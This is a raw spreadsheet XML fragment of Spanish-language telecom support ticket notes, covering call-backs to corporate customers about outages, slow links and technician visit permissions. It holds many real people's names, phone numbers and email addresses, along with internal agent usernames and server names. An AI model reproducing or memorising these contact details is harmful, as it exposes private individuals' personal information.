ID: 313900365T
IDENTIFICADOR DEL ENLACE CC_GMG_GT_INTERNET_TIENDA_114
UBICADO EN:INTERNET_3 C. 19-50 Z.8 MIXCO SAN CRISTOBAL SECTOR B6 LOCAL 17 BLV PRINCIPAL¿
QUEDAMOS A LA ESPERA DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4587501</t>
  </si>
  <si>
    <t>SE REALIZA LLAMADA A MONITOREO DE CAJEROS, ATIENDE JUAN ALVARADO QUIEN INDICA QUE TRASLADARÁ LA LLAMADA AL AREA CORRESPONDIENTES Y CORTA.
3001859642
COLA:
NOMBRE: A: 24207212
NÚMERO: 24207212
DURACIÓN: 0:00:50
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 24207212
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: WILLIAMSSANAVRIA
FECHA Y HORA LOCALES: 2/06/2022 11:42:03</t>
  </si>
  <si>
    <t>F4587522</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ALEX CHOC AL 40713509 NO RESPONDE ENVIA A BUZON || SE INTENTARA LUEGO **
ID 1001037677
**</t>
  </si>
  <si>
    <t>F4587523</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE PABLO FLORES AL 33420437  NO RESPONDE ENVIA A BUZON || SE INTENTARA LUEGO **
ID 3001894919
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE PABLO FLORES AL 33420437  NO RESPONDE ENVIA A BUZON || SE INTENTARA LUEGO **
ID 3001881172
**</t>
  </si>
  <si>
    <t>F4587529</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE OTTO PERALTA 54136232 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001924781</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE OTTO PERALTA 54136232 ENVIA DIRECTAMENTE A BUZON, SE INTENTARA LUEGO
-ID 3001919819 - 3001919954</t>
  </si>
  <si>
    <t>SE BRINDAN AVANCES DEL TICKET A OTTO PERALTA/CLIENTE, SE LE INDICA LO DICHO EN CRONOS ANTERIORES; CENTRAL INDICA QUE ESTÁN OPERANDO CON MG; SE TIENE EN LÍNEA A MYNOR DÍAZ/PR 42960341, SE LLAMÓ HASTA 3 VECES A GESTIÓN N1 PARA APOYO, NO CONTESTAN, NO SE TUVO APOYO DE ÉSTOS. TAMBIÉN SE LES ESCRIBIÓ POR SKYPE; SE ESCALA CON KEVYN FONSECA TEAM LEADER VÍA TELEFÓNICA/SKYPE INDICA QUE NOS APOYARÁ CON GESTOR ASIGNADO.</t>
  </si>
  <si>
    <t>SE TIENE CORREO DE CLIENTE AUTORIZANDO LOS PERMISOS
DE: OTTO PERALTA &lt;OPERALTA@GTA.COM.GT&gt;
ENVIADO: JUEVES, 2 DE JUNIO DE 2022 14:58
PARA: LESTER LEONEL RODAS MARROQUIN &lt;LESTERL.RODAS@CLARO.COM.GT&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE ACCESOS || 361700095T || MOYUTA JUTIAPA JUTIAPA
BUENA TARDE FAVOR DE PROCEDER DE MANERA URGENTE.
SLDS
*-*-*-*-*</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 42960341  CONTESTA EL SEÑOR MYNOR DIAZ AL 42960341 INDICA QUE NO HAY ENERGIA QUE SE LE DE SEGUIMIENTO A LAS 15:00 HRS **
ID 3001882324
**</t>
  </si>
  <si>
    <t>F4587531</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE WALTER REYES AL 45787911 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 3001868870
**</t>
  </si>
  <si>
    <t>F4587536</t>
  </si>
  <si>
    <t>F4587584</t>
  </si>
  <si>
    <t>SE LLAMÓ/HABLÓ CON MALAQUÍAS PANJOJ/CLIENTE 22437253 INDICA ENLACE OK, AUTORIZA CIERRE DEL TICKET.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE STEVEN MARQUEZ 2243-7253 MENCIONA QUE EL SERVICIO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001963721</t>
  </si>
  <si>
    <t>F4587586</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ARNOLDO SANCHEZ AL 61017966 INDICA QUE EL DIA DE AYER LE CAMBIARON EL MODEM Y QUE LE DIJERON AYER QUE HOY TERMINARIAN EL PROCESO Y ESTA REALIZANDO TES DE VELOCIDAD Y SOLO TIENE 10.41 DE DESCARGA Y 14.47 DE SUBIDA || SE NBOTIFICA A GESTOR**
ID 3001896877
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. ARNOLDO SANCHEZ 61017966 INFORMA QUE NO ESTA EN LA OFICINA, REALIZARA PRUEBA NUEVAMENTE YA QUE SOLO 15 MEGAS TENIA, SOLCITA QUE SE LE LLAME DESPUES DE LA 1:30 PM ID: 1001047069</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  SR. ARNOLDO SANCHEZ 61017966 MENCIONA QUE PERSISTE EL INCONVENIENTE, NO ALCANZA EL ANCHO DE BANDA CONTRATADO PERO INDICA QUE NO PUEDE REALIZAR PRUEBAS EN ESTE MOMENTO POR LO QUE SOLICITA LLAMDA PARA EL DIA  LUNES 9:00 HRS
-ID 1001170555</t>
  </si>
  <si>
    <t>F4587604</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DINETH MORATAYA 30577102 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001694525</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DINETH.MORATAYA 30577102 MENCIONA QUE TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001164369</t>
  </si>
  <si>
    <t>SE HABLÓ CON DINETH MORATAYA/CLIENTE 30577102 INDICA ENLACE MEJORÓ DE MODO CONSIDERABLE, PIDE SE MANTENGA SERVICIO EN MONITOREO HASTA EL DÍA LUNES A LAS 16:00 HORAS. DE PERSISTIR EL PROBLEMA INDICA QUE PEDIRÁ SE COORDINE VISITA TÉCNICA.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DINETH.MORATAYA 30577102 MENCIONA QUE  EL SERVICIO ES MUY INESTABLE PERO NO PUEDE REALIZAR PRUEBAS EN ESTE MOMENTO
CLIENTE SOLICITA LLAMADA PARA MAÑANA A LAS 16:00 HRS
-ID 3001932597</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DINETH.MORATAYA AL  3057-7102 NO RESPONDE || ENVIA A BUZON ||
SE INTENTARA LUEGO **
ID 3001870836
**</t>
  </si>
  <si>
    <t>F4587610</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE KAREN JUAREZ 94798017 PERO INDICA QUE SU PERSONAL ESTA EN HORA DE ALMUERZO, SOLICITA LLAMADA A LAS 13:30 HORAS, PARA RETOMAR EL SEGUIMIENTO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SRITA. LIGIA 96875651 MENCIONA QUE AUN PERSISTE EL PROBLEMA EN SACAR LLAMADAS, SE DEJA EN CONFERENCIA CON GESTOR
-ID 1001070810</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE SRITA. LIGIA 96875651 CONFIRMA QUE EL SERVICIO ESTA FUNCIONANDO CORRECTAMENTE, SE PROCEDE AL CIERRE DEL TICKET
1001585204</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE SRITA. LIGIA 96875651 INDICA QUE POR EL MOMENTO EL SERVICIO ESTA FUNCIONANDO CORRECTAMENTE, PERO SOLICITA LLAMADA A LAS 11:00 HORAS
1001479865
COLA:
NOMBRE: A: 0050496875651
NÚMERO: 0050496875651
ESTADO: CONECTADA
DURACIÓN: 0:00:17
DETALLES: 0050496875651
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSEGODINEZ
FECHA Y HORA LOCALES: 6/06/2022 08:43:52</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE LIGIA PERO NO CONTESTA. SE ESTARA VALIDANDO EL DIA DE MAÑANA EN HORARIO HABIL.
1001174292, 1001174422, 1001174502.
COLA:
NOMBRE: A: 0050496875651
NÚMERO: 0050496875651
DURACIÓN: 0:00:02
ESTADO: MARCANDO
DETALLES: 0050496875651
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 3/06/2022 17:04:16
COLA:
NOMBRE: A: 0050496875651
NÚMERO: 0050496875651
DURACIÓN: 0:00:24
ESTADO: MARCANDO
DETALLES: 0050496875651
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 3/06/2022 17:03:55</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE SRITA. LIGIA 96875651 PERO NO SE TIENE RESPUESTA, SE INTENTARA EN UNOS INSTANTES
1001559096
COLA:
NOMBRE: A: 0050496875651
NÚMERO: 0050496875651
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DURACIÓN: 0:00:38
DETALLES: 0050496875651
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSEGODINEZ
FECHA Y HORA LOCALES: 6/06/2022 12:31:12
1001559272
COLA:
NOMBRE: A: 0050496875651
NÚMERO: 0050496875651
ESTADO: MARCANDO
DURACIÓN: 0:00:10
DETALLES: 0050496875651
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSEGODINEZ
FECHA Y HORA LOCALES: 6/06/2022 12:31:21</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE LIGIA 96875651 INDICA QUE ESTA REALIZANDO PRUEBAS DE LLAMADAS, SOLICITA QUE SE LE CONTACTE A LAS 17:00 HORAS</t>
  </si>
  <si>
    <t>F4587626</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE CON EVIDENCIAS SERVICIO A NIVEL DE CLARO OK., SE OBSERVA EN GRAFICAS SATURACION_-
RE: REPORTE DE SATURACIÓN CON TEG 04 - BLVD NORTE(GAS. PUMA) 192.168.42.0/24</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 2 DE JUNIO DE 2022 16:37
PARA: YENSI SUCELY CALGUA MATEO &lt;YENSI.CALGUA@CLARO.COM.GT&gt;; ARNOLD JOSUE CABALLERO SARMIENTO &lt;ARNOLD.CABALLERO@FARSIMAN.COM&gt;; CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.HN&gt;; ARNOLD CABALLERO &lt;NOTIFICACION@FARMACIASIMAN.NET&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; NOC &lt;NOC@CLARO.COM.HN&gt;; CLIENTES VIP HN &lt;CLIENTES.VIP@CLARO.COM.HN&gt;; NIVEL 2 VIP &lt;NIVEL2.VIP@CLARO.COM.HN&gt;; CLARO CORPORACIONES &lt;CLAROCORPORACIONES@CLARO.COM.HN&gt;; SOPORTE N1 CNOC &lt;SOPORTEN1.CNOC@CLARO.COM.GT&gt;
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KAREN.RODRIGUEZ@FARSIMAN.COM &lt;KAREN.RODRIGUEZ@FARSIMAN.COM&gt;; SIMANTEGA4@FARSIMAN.COM &lt;SIMANTEGA4@FARSIMAN.COM&gt;; SIMANTEGA4B@FARSIMAN.COM &lt;SIMANTEGA4B@FARSIMAN.COM&gt;
ASUNTO: RE: REPORTE DE SATURACIÓN CON TEG 04 - BLVD NORTE(GAS. PUMA) 192.168.42.0/24
*-*-*-*-*</t>
  </si>
  <si>
    <t>SE COMPARTE LO SOLICITADO POR CLIENTE--
RE: REPORTE DE SATURACIÓN CON TEG 04 - BLVD NORTE(GAS. PUMA) 192.168.42.0/24</t>
  </si>
  <si>
    <t>F4587636</t>
  </si>
  <si>
    <t>SE LLAMA A CENTRAL MARVIN MENCIONA QUE ENVIARA LOS DATOS A LA AGENCIA DE BANRURAL POR LO QUE SOLICITA SE PROCEDA A LA VISITA TECNICA A PARTIR DE LAS 14:00 HRS
-ID 1001104594</t>
  </si>
  <si>
    <t>F4587640</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RAUL SOSA AL 70695335 INDICA QUE NO SE ENCUENTRA EN SITIO QUE SE LE LLAME EN 30 MINUTOS **
ID 3001900105
**</t>
  </si>
  <si>
    <t>SE LLMA A CLIENTE RAUL SOSA 70695335 MENCIONA QUE NO LLEGA AL ANCHO DE BANDA CONTRATADO Y TIENE TIEMPOS DE RESPUESTA ALTOS, SE DEJA EN CONFERENCIA CON GESTOR
-ID 3001916145</t>
  </si>
  <si>
    <t>F4587656</t>
  </si>
  <si>
    <t>** SE LLAMA A CLIENTE CARLOS CHENG 43246230 CLIENTE SOLICITA QUE SE MANTENGA EN MONITOREO PARA MAÑANA A LAS 9:00 AM **
ID 3001947199
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JUAN CARLOS CHENG 43246230  NO RESPONDE, SE INTENTARA LUEGO
-ID 1001041939</t>
  </si>
  <si>
    <t>** SE LLAMA A CLIENTE CARLOS CHENG 43246230 NO RESPONDE, ENVIA A BUZON | SE INTENTARA LUEGO  **
ID 1001025322
**</t>
  </si>
  <si>
    <t>F4587672</t>
  </si>
  <si>
    <t>** SE LLAMA A CLIENTE ALFREDO IXMATA 56741483 CONFIRMA SERVICIO ESTABLE  Y OPERATIVO**
ID 3001948895
**</t>
  </si>
  <si>
    <t>F4587679</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JESICA GARCIA-56072777 CONFIRMA SERVICIO ### SE PROCEDE ALC IERRE##VIVO</t>
  </si>
  <si>
    <t>F4587680</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 2338-5858 NO RESPONDE || SE INTENTARA LUEGO **
ID 3001902702
**</t>
  </si>
  <si>
    <t>-* SE SOLICITA APOYO A PERSONAL DE CNOC CON EL ENVÍO DE LAS PRUEBAS A CLIENTE -*
-*</t>
  </si>
  <si>
    <t>F4587688</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 55 5174 5290 ILEANA RAMOS COMUNICA A KARINA REYES E INDICA QUE ESTA SUPER LENTO AUN Y TIENE PERDIDA DE PAQUETES  || SE NOTIFICA A GESTOR **
ID 3001904946
**</t>
  </si>
  <si>
    <t>F4587689</t>
  </si>
  <si>
    <t>SE LLAMÓ/HABLÓ CON MONTSERRAT GARRIDO/CLIENTE 00 525551745299 INDICA QUE NO AÚN TENIDO RESPUESTA DE SU CLIENTE FINAL; PIDE SE LE LLAME A LAS 13:00 HORAS PARA AVANCES. HAY SEGUIMIENTO VÍA CORREO:
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL MP231101082S Y MP230601083S::: TICKET CNOC IMDHE020572::: "PERDIDA DE PAQUETES"</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174 5290 DEJAN EN ESPERA Y NO RETOMAN LA LLAMADA
-ID 1001165259</t>
  </si>
  <si>
    <t>F4587708</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DARWIN CHAVARRIA AL 7851-6218 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 3001936383
**</t>
  </si>
  <si>
    <t>SE TIENE CORREO DE CLIENTE CONFIRMANDO LOS PERMISOS
DE: DARWIN CHAVARRIA &lt;DCHAVARRIA@SUPERSELECTOS.COM.SV&gt;
ENVIADO: JUEVES, 2 DE JUNIO DE 2022 14:19
PARA: JUAN CARLOS LOPEZ SANCHEZ &lt;JUAN.LOPEZS@CLARO.COM.GT&gt;; HENRIQUEZ RECINOS, JOSE MARVIN &lt;HENRIQUEZ.MARVIN@CLARO.COM.SV&gt;; SOPORTE N1 CNOC &lt;SOPORTEN1.CNOC@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: ZZ_CC_AAA &lt;ZZ_CC_AAA@CLARO.COM.SV&gt;; LEÓN ZÚNIGA, RAFAEL ENRIQUE &lt;LEON.RAFAEL@CLARO.COM.SV&gt;
ASUNTO: RE: SERVICIO CON FALLA IP2134039
BUENAS TARDES,
PUEDEN PROCEDER, EN EL SITIO YA ESTÁN NOTIFICADOS SOBRE LA VISITA DEL PERSONAL DE CLARO.
SALUDOS CORDIALES.
 *-*-*-*-*-</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DARWIN CHAVARRIA 78516218 MENCIONA QUE YA ESTAN GESTIONADOS LOS PERMISOS DE PERSONAL TENCNICO
-ID 3001913741</t>
  </si>
  <si>
    <t>F4587733</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 00 525551745299 PARA SEGUIMIENTO, NO CONTESTA; SE DEBE INTENTAR MÁS TARDE; ADICIONAL SE PIDE APOYO VÍA CORREO:
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 64100004::: TICKET CNOC IMJOJ000332::: "FUERA DE SERVICIO "</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 55 5174-5299 NO RESPONDEN CORTAN LLAMADA || SE INTENTARA LUEGO **
ID 1001020187
**</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE, SE QUEDA A ESPERA DE RESPUESTA
DE: LUVY ESAU SANDOVAL MATEO &lt;LUVY.SANDOVAL@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 2 DE JUNIO DE 2022 13:32
PARA: LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; GARRIDO RODRIGUEZ LAEYLA MONSERRAT &lt;GRODRIGL@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; JHONNSER JEHONADAS ESCOBAR LUCERO &lt;JHONNSER.ESCOBAR@CLARO.COM.GT&gt;; HERNANDEZ SUESCUM JOSE OSWALDO &lt;JHSUESCU@UNINET.COM.MX&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 64100004::: TICKET CNOC IMJOJ000332::: "FUERA DE SERVICIO "
BUENAS TARDES, INGENIERO.
SOLICITAMOS DE SU APOYO PARA BRINDAR CONTACTOS TELEFÓNICOS DE SITIO REMOTO, ES NECESARIO VALIDAR PRUEBAS DE PRIMER NIVEL DEBIDO A QUE NO SE OBSERVA LINK DE FIBRA ÓPTICA.
QUEDAMOS ATENTOS A SUS COMENTARIOS,
SALUDOS.</t>
  </si>
  <si>
    <t>F4587743</t>
  </si>
  <si>
    <t>SE BRINDAN AVANCES DEL TICKET A ARMANDO CHUC/CLIENTE; SE LE INDICA QUE SE HABLARÁ CON PR PARA SEGUIMIENTO. SE TIENE CELSO MONTERROSO/PR 42106002 PARA SEGUIMIENTO, SE PIDE APOYO A GESTIÓN N1 VÍA SKYPE, VÍA TELEFÓNICA APOYA SAMUEL ESTRADA/GESTOR N1; EN TRIPARTITA ÉSTOS, ESTÁN GESTIONANDO EL CASO, EN ESPERA DE LO QUE DETERMINEN.</t>
  </si>
  <si>
    <t>F4587745</t>
  </si>
  <si>
    <t>SE PROCEDE A CONTACTAR A CLIENTE SR. MATAMOROS 32021098
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE ENVIO CORREO NUEVAMENTE AL CLIENTE.
BUENAS TARDES,
ESTAMOS A LA ESPERA DE LA AUTORIZACIÓN DE LOS PERMISOS.
PARA PODER ENVIAR AL PERSONAL TÉCNICO.
QUEDAMOS A LA ESPERA.
SALUDOS.</t>
  </si>
  <si>
    <t>CLIENTE INDICA QUE TIENE UN EQUIPO TELDAT Y UN IMC, CLIENTE INDICA QUE EL IMC SE ENCUENTRA ALARMADO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA NUEVAMENTE CON CLIENTE SR. MATAMOROS 32021098 NOS MANTIENE EN LINEA
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>CLIENTE REINICIA EL EQUIPO, PERO SERVICIO NO RESTABLECE
SE LE INDICA AL CLIENTE QUE ES NECESARIO ENVIAR PERSONAL TECNICO PARA REVISION DE LA FO, CLIENTE INDICA QUE SE COORDINE LA VISITA ELLOS SE RETIRAN A ALS 17:00 HRS SOLICITA QUE SE ENVIE CORREO CON LOS DATOS DEL PERSONAL TECNICO A INBOXPDTELECOM.MX@JW.ORG, ALEXMAGARCIA98@GMAIL.COM
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4587771</t>
  </si>
  <si>
    <t>SE HABLO CON CLIENTE NOEL CESEÑA Y SE INTENTO BUSCAR EL EQUIPO OPTIMUX PERO NO LOGRO UBICARLOS SE PROCEDERÁ A SOLICITAR VISITA TECNICA.</t>
  </si>
  <si>
    <t>SE HABLO CON CLIENTE NOEL CESEÑA E INDICÓ QUE SE LE PUEDA LLAMAR EN 20 MINUTOS YA QUE NO ESTÁ EN LA UBICACIÓN.</t>
  </si>
  <si>
    <t>SE CONTACTA VALERIA PADILLA DEL 22040404 ID 3001919640 PARA EL SEGUIMIENTO DEL TICKET SD1131290  EN EL CUAL APARECE QUE ESTA PENDIENTE DE LLAMAR A NOEL CESEÑA EN 20 MINUTOS Y ESTAMOS SOBRE EL TIEMPO Y AUN NO HAY SEGUIMIENTO, SE LE LLAMA AL 42100585 ID 3001920321 COMENTA QUE NO ESTA AUN EL SERVICIO EN FUNCIÓN Y AL ESTAR EN PC SE CONTACTARA CON EL GESTOR Y SE LE NOTIFICA A VALERIA QUE SE VE A TRANSFERIR CON EL ÁREA QUE CORRESPONDE SE FINALIZA CON ELLA Y SE TRANSFIERE CON EL GESTOR RENE.MONZON AL 8124 ID 3001921934 SE DEJA EN LINEA CON EL PR</t>
  </si>
  <si>
    <t>F4587777</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  ING. ALEXIS NUÑEZ 74695247 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001099859 - 1001100976</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE ING. ALEXIS NUÑEZ 74695247 PERO NO SE TIENE RESPUESTA, SE INTENTARA EN UNOS INSTANTES
1001111955
1001112076
1001112128</t>
  </si>
  <si>
    <t>SE LLAMO AL ING. ALEXIS NUÑEZ QUIEN INDICA QUE EL PERSONAL QUE REALIZA LAS LLAMADAS YA SE RETIRO, POR LO QUE SOLICITA QUE SE LE LLAME EL DIA DE MAÑANA A LAS 12:00PM YA QUE VA A REALIZAR PRUEBAS.
3001956148
COLA:
NOMBRE: A: 0050374695247
NÚMERO: 0050374695247
DURACIÓN: 0:00:13
ESTADO: MARCANDO
DETALLES: 0050374695247
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 2/06/2022 16:34:54</t>
  </si>
  <si>
    <t>F4587784</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
VERIFICACION FALLAS DE ENLACES CLARO ATM 5057 / CAIDA TOTAL Y REVISION DE EQUIPOS</t>
  </si>
  <si>
    <t>F4587803</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE SAMANTA ZURDIA QUIEN INDICA QUE LA PBX NO ENCIENDE, PERO SOLICITA QUE SE LE ENVIE TECNICO PARA DESCARTAR QUE  A NIVEL DE CLARO TODO SE ENCUENTRA BIEN.
3001916030
COLA:
NOMBRE: A: 41511738
NÚMERO: 41511738
DURACIÓN: 0:00:11
ESTADO: MARCANDO
DETALLES: 41511738
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 2/06/2022 14:28:36</t>
  </si>
  <si>
    <t>F4587810</t>
  </si>
  <si>
    <t>|| SE LE ENVIA CORREO A CLIENTE SOLICITANDO ACCESOS EN SITIO REMOTO || PENDIENTE CONFIRMACIÓN
ERITO FERNANDO TECU XITUMUL
ASUNTO: VISITA TÉCNICA IP2135010SV || BANCO PROCREDIT S.A. || CHALCHUAPABO. LAS ANIMAS2A. CALLE OTE64
BUENA TARDE ESTIMADOS.
EN SEGUIMIENTO AL SERVICIO REPORTADO IP2135010SV || BANCO PROCREDIT S.A. || CHALCHUAPABO. LAS ANIMAS2A. CALLE OTE64. SOLICITAMOS NOS PUEDAN APOYAR EN GESTIONAR ACCESOS PARA PERSONAL TÉCNICO QUE ATENDERÁ UNA VISITA EL DÍA DE MAÑANA VIERNES 03/06 A PARTIR DE LAS 8:00 HRS.
ADJUNTO LOS DATOS DEL POSIBLE PERSONAL ASIGNADO.</t>
  </si>
  <si>
    <t>CLIENTE MENCIONA QUE YA RECIBIO EL CORREO
CLIENTE EN LLAMADA CONFIRMA LOS ACCESOS PARA MAÑANA A LAS 9:30
-ID 3001958691</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 2 DE JUNIO DE 2022 16:47
PARA: ERITO FERNANDO TECU XITUMUL &lt;ERITO.TECU@CLARO.COM.GT&gt;; JMELGAR@BANCATLAN.SV &lt;JMELGAR@BANCATLAN.SV&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: VISITA TÉCNICA IP2135010SV || BANCO PROCREDIT S.A. || CHALCHUAPABO. LAS ANIMAS2A. CALLE OTE64
*-*-*-*-*-*</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  RICARDO MELGAR 72553004 MENCIONA QUE AUN NO HA RECIBIDO EL CORREO Y CONFIRMA EL CORREO
---- JMELGAR@BANCATLAN.SV  ----
-ID 3001958691</t>
  </si>
  <si>
    <t>F4587819</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE BRANDON CRUZ 24583030 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 3001977540</t>
  </si>
  <si>
    <t>F4587824</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE TANIA PASTORE AL 79864486 NO RESPONDE ENVIA A BUZON ||
SE INTENTARA LUEGO **
ID 3001937806
**</t>
  </si>
  <si>
    <t>F4587832</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  RAFAEL MANZO-+522223557737 -- COEMTNA QUE EL NUMERO QUE REPORTA ES EL  22228080
ADEMAS, INDICA QUE EL SI MARCA DESDE MX MARCA EL  8008080  Y ADEMAS MENCIONA QUE SE DESBORDA HACIA UN NUMERO DE TIGO 25060801</t>
  </si>
  <si>
    <t>SE LAMA A CLIENTE  RAFAEL MANZO-+522223557737 SE LE EXPLICA QUE SU NUMERO ES DE OTRO PROVEEDOR DE TELEFONIA / TELEFONICA- ## VIVO</t>
  </si>
  <si>
    <t>F4587835</t>
  </si>
  <si>
    <t>-* NELSON 58181162 (CLIENTE) INFORMA QUE YA QUEDO RESUELTO EL INCONVENIENTE, ESCALO CONSU PROVEEDOR INTERNO Y LE COMENTARON QUE TUVIERON AFECTACION A NIVEL GENERAL, AUTORIZA CIERRE DE TICKET -*
-*</t>
  </si>
  <si>
    <t>F4587865</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 42106014 CONTESTA WILLYAN CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
 ID 3001940343
**</t>
  </si>
  <si>
    <t>F4587890</t>
  </si>
  <si>
    <t>OSCAR MIGUEL GOMEZ GUEVARA-58260401   SE TIENE A CLIENTE EN LINEA!! ##NOS INDICA QUE ES EL EJECUTIVO + QUE NO TIENE CONOCIMIENTO DE ESTE REPORTE+ MENCIONA QUE CLIENT EUNICAMENTE LE HA CONSULTADO SOBRE  CUANTOS DID'S TIENE ASIGNADOS--- EN ESTE MOEMNTO ESTA CONTACTANDO A CLIENTE PARA VERIFICAR EL REPORTE ##VIVO
##A NIVEL DE CLARO TODO OK ##</t>
  </si>
  <si>
    <t>###SE HABLA CON EJEUCTIIVO, INDICA QUE LCINETE NO HA REPORTADO NADDA #### SE PROCEDE AL CIERRE DEL CASO ### EJECUTIVO ENTERADO</t>
  </si>
  <si>
    <t>F4587895</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7895
ID: 349900099T
IDENTIFICADOR DEL CLIENTE: CC_IJSUD_GT_BARRIO_ANTIGUA
UBICADO EN: INTERNET.- CALLE DEL MANCHEN NO.4 ANTIGUA GUATEMALA
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>CLIENTE NO ESTÁ EN SITIO, PIDE SE LE LLAME MAÑANA A LAS 09:00AM PARA CONTINUAR CON EL SEGUIMIENTO DEL TICKET.</t>
  </si>
  <si>
    <t>F4587897</t>
  </si>
